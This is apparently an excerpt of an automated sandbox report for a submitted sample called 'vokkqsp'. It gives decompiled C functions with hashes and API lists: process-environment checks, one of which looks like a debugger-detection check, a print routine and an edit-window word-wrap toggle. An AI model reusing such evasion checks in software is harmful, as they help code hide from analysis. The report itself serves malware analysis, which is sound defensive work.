                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f41065dbd041c6edef7926828869e2cbbd3ec4de1933b9ea488147aadcb9d12c
                                                      • Instruction ID: c2d81389a5775e2ae5b94b443cba90dda5ff59f77101d3520c39a9e830fd1a18
                                                      • Opcode Fuzzy Hash: f41065dbd041c6edef7926828869e2cbbd3ec4de1933b9ea488147aadcb9d12c
                                                      • Instruction Fuzzy Hash: E6F0CD31340311EBC705CA2CE558B2A37A8E705304FA2007AE005D7382C6B8EE40C609
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004262BC Relevance: .0, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E004262BC(void* __ecx) {
				signed int _v8;
				intOrPtr _t10;
				signed int _t18;

				_t18 =  *0x44cd7c; // 0x0
				if(_t18 == 0) {
					_v8 = _v8 & _t18;
					_t18 = _t18 + 1;
					_t10 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t21 =  *((intOrPtr*)(_t10 + 8));
					if( *((intOrPtr*)(_t10 + 8)) >= 0) {
						E0042A6A8(_t21,  &_v8);
						if(_v8 == _t18) {
							_t18 = 2;
						}
					}
					 *0x44cd7c = _t18;
				}
				return _t18;
			}






                                                      0x004262c3
                                                      0x004262cc
                                                      0x004262d4
                                                      0x004262d7
                                                      0x004262d8
                                                      0x004262db
                                                      0x004262df
                                                      0x004262e5
                                                      0x004262ed
                                                      0x004262f1
                                                      0x004262f1
                                                      0x004262ed
                                                      0x004262f9
                                                      0x004262f9
                                                      0x004262ff

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b7ee1e0b41417491fe59c3027bf7d9bd06017496c5e8cb3fedf440f33210da5c
                                                      • Instruction ID: df2265a667e10c8acd6ecb2c3ffb58b628cc3629c626def48b00d657704740b9
                                                      • Opcode Fuzzy Hash: b7ee1e0b41417491fe59c3027bf7d9bd06017496c5e8cb3fedf440f33210da5c
                                                      • Instruction Fuzzy Hash: B7F0A031A12230DFCB12D78CD445B8973B8EB4AB11F5240ABE401D7240C3B4DD00C7D8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00426300 Relevance: .0, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00426300(void* __ecx) {
				char _v8;
				intOrPtr _t9;
				intOrPtr _t17;
				char _t19;

				_t17 =  *0x44cd80; // 0x0
				if(_t17 == 0) {
					_t19 = _t17 + 1;
					_v8 = _t19;
					_t9 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t21 =  *((intOrPtr*)(_t9 + 8));
					if( *((intOrPtr*)(_t9 + 8)) < 0) {
						L3:
						_t17 = 2;
					} else {
						E0042A668(_t21,  &_v8);
						if(_v8 == _t19) {
							goto L3;
						}
					}
					 *0x44cd80 = _t17;
				}
				return _t17;
			}







                                                      0x00426307
                                                      0x00426310
                                                      0x00426318
                                                      0x00426319
                                                      0x0042631c
                                                      0x0042631f
                                                      0x00426323
                                                      0x00426333
                                                      0x00426335
                                                      0x00426325
                                                      0x00426329
                                                      0x00426331
                                                      0x00000000
                                                      0x00000000
                                                      0x00426331
                                                      0x0042633d
                                                      0x0042633d
                                                      0x00426343

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c66003e83405ba6d4bd3071865a3329d4b8dcdf9c1940a3b54f2e65dcdb1e695
                                                      • Instruction ID: e6eedbf44311bfaab19765213e74062f20b090e42dbc37ea549310c93e9684a3
                                                      • Opcode Fuzzy Hash: c66003e83405ba6d4bd3071865a3329d4b8dcdf9c1940a3b54f2e65dcdb1e695
                                                      • Instruction Fuzzy Hash: 18F0A071A112309FCB26CB4CD844A89B3ACEB45B54F56406BE800D7240C7B8ED00CBD4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00426169 Relevance: .0, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00426169(void* __ecx, char _a4) {
				char _v8;
				intOrPtr _t10;
				intOrPtr _t13;
				intOrPtr _t16;

				_t10 =  *0x44cd80; // 0x0
				if(_t10 == 0) {
					_v8 = _a4;
					_t13 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t24 =  *((intOrPtr*)(_t13 + 8));
					if( *((intOrPtr*)(_t13 + 8)) >= 0) {
						E0042A668(_t24,  &_v8);
					}
					_t16 = (0 | _v8 == 0x00000001) + 1;
					 *0x44cd80 = _t16;
					return _t16;
				}
				return _t10;
			}







                                                      0x0042616f
                                                      0x00426177
                                                      0x0042617c
                                                      0x00426185
                                                      0x00426188
                                                      0x0042618c
                                                      0x00426192
                                                      0x00426192
                                                      0x004261a5
                                                      0x004261a8
                                                      0x00000000
                                                      0x004261a8
                                                      0x004261ab

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5fe13821cf8f86192e36ec2c7d8a20c3ef95bf2fec5dc0c48ad36143e4b2fd69
                                                      • Instruction ID: 4d8ad789fa6d7cadddac19358a3ff56ab2087f5b1685b17079d4b8aa2d76e91c
                                                      • Opcode Fuzzy Hash: 5fe13821cf8f86192e36ec2c7d8a20c3ef95bf2fec5dc0c48ad36143e4b2fd69
                                                      • Instruction Fuzzy Hash: 99E06D75701344DFDB45CF69D944A0977F8EB44748F654079E415C7251D338EE40CB18
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00426126 Relevance: .0, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00426126(void* __ecx, char _a4) {
				char _v8;
				intOrPtr _t10;
				intOrPtr _t13;
				intOrPtr _t16;

				_t10 =  *0x44cd7c; // 0x0
				if(_t10 == 0) {
					_v8 = _a4;
					_t13 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t24 =  *((intOrPtr*)(_t13 + 8));
					if( *((intOrPtr*)(_t13 + 8)) >= 0) {
						E0042A6A8(_t24,  &_v8);
					}
					_t16 = (0 | _v8 == 0x00000001) + 1;
					 *0x44cd7c = _t16;
					return _t16;
				}
				return _t10;
			}







                                                      0x0042612c
                                                      0x00426134
                                                      0x00426139
                                                      0x00426142
                                                      0x00426145
                                                      0x00426149
                                                      0x0042614f
                                                      0x0042614f
                                                      0x00426162
                                                      0x00426165
                                                      0x00000000
                                                      0x00426165
                                                      0x00426168

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1756ddd501228183400b797cc915454d0f870eb072023a2d76a63c22a0de13f0
                                                      • Instruction ID: 1619ec32f712a51cff69e41a3a2845d913d937b5065e7e07878749c80917fdd3
                                                      • Opcode Fuzzy Hash: 1756ddd501228183400b797cc915454d0f870eb072023a2d76a63c22a0de13f0
                                                      • Instruction Fuzzy Hash: 12E0ED34602244DFCB05CF29C440A0AB7F8EB89348F604079E804C3201D338EE00CB04
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00426344 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00426344(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E0042A628(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}






                                                      0x00426351
                                                      0x00426353
                                                      0x00426356
                                                      0x00426359
                                                      0x0042635c
                                                      0x0042636d
                                                      0x0042636f
                                                      0x0042635e
                                                      0x00426362
                                                      0x0042636b
                                                      0x00000000
                                                      0x00000000
                                                      0x0042636b
                                                      0x00426374

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8fd3771e0d0b19075128217a832d511a52d02da1d313d66324e2cce0c36cb9fe
                                                      • Instruction ID: 5e1aa68ce532eea3cf0b2d1986f9c83ab9da4d84abf5ad36f973872e05fbfc56
                                                      • Opcode Fuzzy Hash: 8fd3771e0d0b19075128217a832d511a52d02da1d313d66324e2cce0c36cb9fe
                                                      • Instruction Fuzzy Hash: AAE08C72A11238EBCB15DB89D90498AF3FCEB44B04B56009BB901D3210C674DE00CBD4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00426207 Relevance: .0, Instructions: 18COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00426207(void* __ecx, char _a4) {
				char _v8;
				intOrPtr _t11;

				_v8 = _a4;
				_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t17 =  *((intOrPtr*)(_t11 + 8));
				if( *((intOrPtr*)(_t11 + 8)) >= 0) {
					E0042A628(_t17,  &_v8);
				}
				return 0 | _v8 != 0x00000001;
			}





                                                      0x00426210
                                                      0x00426219
                                                      0x0042621c
                                                      0x00426220
                                                      0x00426226
                                                      0x00426226
                                                      0x00426235

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6cfdc68d18d4c8f134e58fe6f3e1ce8538a7b7d6dbde2acdb1afc528fcee33f9
                                                      • Instruction ID: 49412071b65622fb0b59ad4c8e44dcce5ae21920afe42cd0459a20d7046be473
                                                      • Opcode Fuzzy Hash: 6cfdc68d18d4c8f134e58fe6f3e1ce8538a7b7d6dbde2acdb1afc528fcee33f9
                                                      • Instruction Fuzzy Hash: A6E08230601248EFCB00EBA9D448A4AB7F8EB48348FA148A8E804C3240C738EF80CA00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040DF53 Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0040DF53(void* __ecx, void* __eflags) {

				if(E00426344(__ecx) == 1 || ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) != 0) {
					return 0;
				} else {
					return 1;
				}
			}



                                                      0x0040df5b
                                                      0x0040df74
                                                      0x0040df6f
                                                      0x0040df71
                                                      0x0040df71

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f5c3ec08a14f93fd17c7750127b6368c369c13261ccb34751d8d83959a91489b
                                                      • Instruction ID: e3fe9dae7eaa156b4aaad332c35877667e839b784fbbcb562f65275754edd698
                                                      • Opcode Fuzzy Hash: f5c3ec08a14f93fd17c7750127b6368c369c13261ccb34751d8d83959a91489b
                                                      • Instruction Fuzzy Hash: 4EC08C7450090086CF298A548271BE63365F3927C2F8004AED8430B792C52E9D8AD608
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401AA8 Relevance: 56.2, APIs: 30, Strings: 2, Instructions: 227memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 98%
                                                      			E00401AA8(void* __edi) {
				signed int _v8;
				void* _v12;
				int _v16;
				intOrPtr _v50;
				signed int _v52;
				intOrPtr _v54;
				short _v56;
				signed int _v58;
				signed int _v60;
				signed int _v64;
				struct HDC__* _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				struct tagPD _v84;
				long _v88;
				void* _v92;
				signed int _v96;
				char* _v100;
				signed int _v104;
				void* _v108;
				struct _DOCINFOW _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				char _v144;
				struct tagLOGFONTW _v236;
				char _v1236;
				intOrPtr _t91;
				intOrPtr _t94;
				int _t97;
				signed int _t107;
				int _t112;
				int _t115;
				int _t119;
				int _t122;
				int _t123;
				int _t127;
				void* _t129;
				void* _t130;
				signed int _t135;
				void* _t144;
				signed int _t146;
				signed int _t149;
				signed int _t154;
				void* _t156;
				void* _t161;
				struct tagPD _t163;
				int _t166;
				signed int _t174;

				_t156 = __edi;
				_t163 = 0x42;
				_v88 = 0;
				E00403D00(__edi,  &_v84, 0, _t163);
				_t91 =  *0x44cf04; // 0x0
				_v80 = _t91;
				_v76 =  *0x44e0ec;
				_v72 =  *0x44e0f0;
				_t94 =  *0x44cf00; // 0x0
				_v50 = _t94;
				_v84 = _t163;
				_v60 = 0;
				_v64 = 0x104;
				_v56 = 1;
				_v54 = 0xffff;
				_t97 = PrintDlgW( &_v84);
				if(_t97 != 0) {
					 *0x44e0ec = _v76;
					 *0x44e0f0 = _v72;
					SetMapMode(_v68, 1);
					_v128.cbSize = 0x14;
					_v128.lpszDocName = 0x44d598;
					_v128.lpszOutput = 0;
					_v128.lpszDatatype = 0;
					_v128.fwType = 0;
					if((_v64 & 0x00000020) == 0) {
						L3:
						_t26 = GetWindowTextLengthW( *0x44cf0c) + 1; // 0x1
						_t166 = _t26;
						_t144 = HeapAlloc(GetProcessHeap(), 0, _t166 + _t166);
						_v12 = _t144;
						if(_t144 != 0) {
							_v8 = GetWindowTextW( *0x44cf0c, _t144, _t166);
							_t107 = StartDocW(_v68,  &_v128);
							__eflags = _t107;
							if(_t107 <= 0) {
								L17:
								DeleteDC(_v68);
								return HeapFree(GetProcessHeap(), 0, _t144);
							}
							_push(_t156);
							_t112 = MulDiv( *0x44dc70, GetDeviceCaps(_v68, 0x5a), 0x9ec);
							_v140 = _t112 - GetDeviceCaps(_v68, 0x71);
							_t115 = MulDiv( *0x44dc74, GetDeviceCaps(_v68, 0x5a), 0x9ec);
							_v132 = GetDeviceCaps(_v68, 0x6f) - _t115;
							_t119 = MulDiv( *0x44dc78, GetDeviceCaps(_v68, 0x58), 0x9ec);
							_v144 = _t119 - GetDeviceCaps(_v68, 0x70);
							_t122 = MulDiv( *0x44dc7c, GetDeviceCaps(_v68, 0x58), 0x9ec);
							_t123 = GetDeviceCaps(_v68, 0x6e);
							_t146 = 0x17;
							_v136 = _t123 - _t122;
							memcpy( &_v236, 0x44cf20, _t146 << 2);
							_t127 = MulDiv(_v236.lfHeight, GetDeviceCaps(_v68, 0x5a), _v16);
							_v236.lfWeight = _v236.lfWeight - 0x64;
							_v236 = _t127;
							_t129 = CreateFontIndirectW( &_v236);
							_v16 = _t129;
							_t130 = SelectObject(_v68, _t129);
							_t144 = _v12;
							_t149 = 1;
							_v92 = _t130;
							_t161 = 1;
							__eflags = 1 - _v52;
							if(1 > _v52) {
								L16:
								EndDoc(_v68);
								SelectObject(_v68, _v92);
								DeleteObject(_v16);
								goto L17;
							}
							_t154 = _v88;
							_t135 = _t144 + _v8 * 2;
							_v8 = _t135;
							do {
								_t64 =  &_v96;
								 *_t64 = _v96 & 0x00000000;
								__eflags =  *_t64;
								_t174 = _t149;
								_v104 = _t135;
								_v108 = _t144;
								_v100 =  &_v1236;
								do {
									__eflags = _v64 & 0x00000002;
									if(__eflags == 0) {
										L12:
										_t154 = E00401814(_v68,  &_v144, __eflags, _t149, _t174,  &_v108);
										_t174 = _t174 + 1;
										__eflags = _t154;
										if(_t154 == 0) {
											goto L16;
										}
										goto L13;
									}
									__eflags = _t174 - (_v58 & 0x0000ffff);
									if(_t174 > (_v58 & 0x0000ffff)) {
										break;
									}
									__eflags = _t174 - (_v60 & 0x0000ffff);
									_t76 = _t174 - (_v60 & 0x0000ffff) >= 0;
									__eflags = _t76;
									_t149 = 0 | _t76;
									goto L12;
									L13:
									__eflags = _v108 - _v104;
									_t149 = 1;
								} while (_v108 < _v104);
								__eflags = _t154;
								if(_t154 == 0) {
									goto L16;
								}
								_t161 = _t161 + 1;
								__eflags = _t161 - (_v52 & 0x0000ffff);
								_t135 = _v8;
							} while (_t161 <= (_v52 & 0x0000ffff));
							goto L16;
						}
						return DeleteDC(_v68);
					}
					_t97 = E00401418(_v80);
					_v128.lpszOutput = _t97;
					if(_t97 != 0) {
						goto L3;
					}
				}
				return _t97;
			}





















































                                                      0x00401aa8
                                                      0x00401ab5
                                                      0x00401abe
                                                      0x00401ac1
                                                      0x00401ac6
                                                      0x00401ace
                                                      0x00401ad6
                                                      0x00401ade
                                                      0x00401ae1
                                                      0x00401ae6
                                                      0x00401aeb
                                                      0x00401af0
                                                      0x00401af7
                                                      0x00401aff
                                                      0x00401b03
                                                      0x00401b0a
                                                      0x00401b12
                                                      0x00401b1f
                                                      0x00401b27
                                                      0x00401b2c
                                                      0x00401b36
                                                      0x00401b3d
                                                      0x00401b44
                                                      0x00401b47
                                                      0x00401b4a
                                                      0x00401b4d
                                                      0x00401b62
                                                      0x00401b6e
                                                      0x00401b6e
                                                      0x00401b83
                                                      0x00401b85
                                                      0x00401b8a
                                                      0x00401ba8
                                                      0x00401bb2
                                                      0x00401bb8
                                                      0x00401bba
                                                      0x00401d50
                                                      0x00401d53
                                                      0x00000000
                                                      0x00401d63
                                                      0x00401bc0
                                                      0x00401be0
                                                      0x00401bf7
                                                      0x00401c06
                                                      0x00401c1d
                                                      0x00401c29
                                                      0x00401c40
                                                      0x00401c4f
                                                      0x00401c58
                                                      0x00401c5c
                                                      0x00401c72
                                                      0x00401c78
                                                      0x00401c87
                                                      0x00401c89
                                                      0x00401c90
                                                      0x00401c9d
                                                      0x00401ca7
                                                      0x00401caa
                                                      0x00401cb0
                                                      0x00401cb5
                                                      0x00401cb6
                                                      0x00401cb9
                                                      0x00401cbb
                                                      0x00401cbf
                                                      0x00401d31
                                                      0x00401d34
                                                      0x00401d40
                                                      0x00401d49
                                                      0x00000000
                                                      0x00401d4f
                                                      0x00401cc4
                                                      0x00401cc7
                                                      0x00401cca
                                                      0x00401ccd
                                                      0x00401ccd
                                                      0x00401ccd
                                                      0x00401ccd
                                                      0x00401cd1
                                                      0x00401cd3
                                                      0x00401cdc
                                                      0x00401cdf
                                                      0x00401ce2
                                                      0x00401ce2
                                                      0x00401ce6
                                                      0x00401cfb
                                                      0x00401d0f
                                                      0x00401d11
                                                      0x00401d12
                                                      0x00401d14
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00401d14
                                                      0x00401cec
                                                      0x00401cee
                                                      0x00000000
                                                      0x00000000
                                                      0x00401cf6
                                                      0x00401cf8
                                                      0x00401cf8
                                                      0x00401cf8
                                                      0x00000000
                                                      0x00401d16
                                                      0x00401d19
                                                      0x00401d1e
                                                      0x00401d1e
                                                      0x00401d21
                                                      0x00401d23
                                                      0x00000000
                                                      0x00000000
                                                      0x00401d29
                                                      0x00401d2a
                                                      0x00401d2c
                                                      0x00401d2c
                                                      0x00000000
                                                      0x00401ccd
                                                      0x00000000
                                                      0x00401b8f
                                                      0x00401b52
                                                      0x00401b57
                                                      0x00401b5c
                                                      0x00000000
                                                      0x00000000
                                                      0x00401b5c
                                                      0x00401d6e

                                                      APIs
                                                      • PrintDlgW.COMDLG32(?), ref: 00401B0A
                                                      • SetMapMode.GDI32(?,00000001), ref: 00401B2C
                                                      • GetWindowTextLengthW.USER32 ref: 00401B68
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401B76
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00401B7D
                                                      • DeleteDC.GDI32(?), ref: 00401B8F
                                                        • Part of subcall function 00401418: GetSaveFileNameW.COMDLG32(?), ref: 0040145C
                                                      • GetWindowTextW.USER32 ref: 00401BA2
                                                      • StartDocW.GDI32(?,00000014), ref: 00401BB2
                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 00401BD1
                                                      • MulDiv.KERNEL32(00000000), ref: 00401BE0
                                                      • GetDeviceCaps.GDI32(?,00000071), ref: 00401BE9
                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 00401BFD
                                                      • MulDiv.KERNEL32(00000000), ref: 00401C06
                                                      • GetDeviceCaps.GDI32(?,0000006F), ref: 00401C0F
                                                      • GetDeviceCaps.GDI32(?,00000058), ref: 00401C20
                                                      • MulDiv.KERNEL32(00000000), ref: 00401C29
                                                      • GetDeviceCaps.GDI32(?,00000070), ref: 00401C32
                                                      • GetDeviceCaps.GDI32(?,00000058), ref: 00401C46
                                                      • MulDiv.KERNEL32(00000000), ref: 00401C4F
                                                      • GetDeviceCaps.GDI32(?,0000006E), ref: 00401C58
                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 00401C7A
                                                      • MulDiv.KERNEL32(?,00000000), ref: 00401C87
                                                      • CreateFontIndirectW.GDI32(?), ref: 00401C9D
                                                      • SelectObject.GDI32(?,00000000), ref: 00401CAA
                                                      • EndDoc.GDI32(?), ref: 00401D34
                                                      • SelectObject.GDI32(?,?), ref: 00401D40
                                                      • DeleteObject.GDI32(?), ref: 00401D49
                                                      • DeleteDC.GDI32(?), ref: 00401D53
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401D5C
                                                      • HeapFree.KERNEL32(00000000), ref: 00401D63
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: CapsDevice$Heap$DeleteObject$ProcessSelectTextWindow$AllocCreateFileFontFreeIndirectLengthModeNamePrintSaveStart
                                                      • String ID: $d
                                                      • API String ID: 1302216391-2084297493
                                                      • Opcode ID: 5815a8abcf0af1fdb1e238782a0e9c64eb422b189945a0ec10b58ff1e3161541
                                                      • Instruction ID: 298ab7f0fb6f79147674bac927ebacb34e7cf82f1521bd2a600f7c6c9329788d
                                                      • Opcode Fuzzy Hash: 5815a8abcf0af1fdb1e238782a0e9c64eb422b189945a0ec10b58ff1e3161541
                                                      • Instruction Fuzzy Hash: 89912675D00269EFDB209FA5EC88A9EBBB9FF05300F00402AEA05B72A0DB755D55CF58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401F06 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 100windowmemoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 87%
                                                      			E00401F06() {
				struct tagRECT _v20;
				void* _t10;
				int _t12;
				struct HWND__* _t18;
				signed int _t26;
				long _t30;
				void* _t31;
				int _t38;
				signed int _t42;

				_t1 = GetWindowTextLengthW( *0x44cf0c) + 1; // 0x1
				_t38 = _t1;
				_t10 = HeapAlloc(GetProcessHeap(), 0, _t38 + _t38);
				_t31 = _t10;
				if(_t31 != 0) {
					GetWindowTextW( *0x44cf0c, _t31, _t38);
					_t12 = SendMessageW( *0x44cf0c, 0xb8, 0, 0);
					DestroyWindow( *0x44cf0c);
					GetClientRect( *0x44cf04,  &_v20);
					_t17 =  !=  ? 0x50b000c4 : 0x50a00044;
					_t18 = CreateWindowExW(0x200, L"edit", 0,  !=  ? 0x50b000c4 : 0x50a00044, 0, 0, _v20.right, _v20.bottom,  *0x44cf04, 0,  *0x44cf00, 0);
					 *0x44cf0c = _t18;
					SendMessageW(_t18, 0x30,  *0x44cf10, 0);
					SetWindowTextW( *0x44cf0c, _t31);
					SendMessageW( *0x44cf0c, 0xb9, _t12, 0);
					SetFocus( *0x44cf0c);
					HeapFree(GetProcessHeap(), 0, _t31);
					_t42 =  *0x44cf7c; // 0x0
					_t26 = 0 | _t42 == 0x00000000;
					 *0x44cf7c = _t26;
					asm("sbb eax, eax");
					_t30 = CheckMenuItem(GetMenu( *0x44cf04), 0x119,  ~_t26 & 0x00000008);
					__imp__#410( *0x44cf0c, 0x4024c7, 0, 0);
					return _t30;
				}
				return _t10;
			}












                                                      0x00401f1d
                                                      0x00401f1d
                                                      0x00401f2c
                                                      0x00401f32
                                                      0x00401f36
                                                      0x00401f44
                                                      0x00401f5d
                                                      0x00401f67
                                                      0x00401f77
                                                      0x00401f8e
                                                      0x00401fb5
                                                      0x00401fc3
                                                      0x00401fcb
                                                      0x00401fd4
                                                      0x00401fe8
                                                      0x00401ff0
                                                      0x00402001
                                                      0x00402009
                                                      0x0040200f
                                                      0x00402012
                                                      0x00402019
                                                      0x00402031
                                                      0x00402044
                                                      0x00000000
                                                      0x00402044
                                                      0x00402050

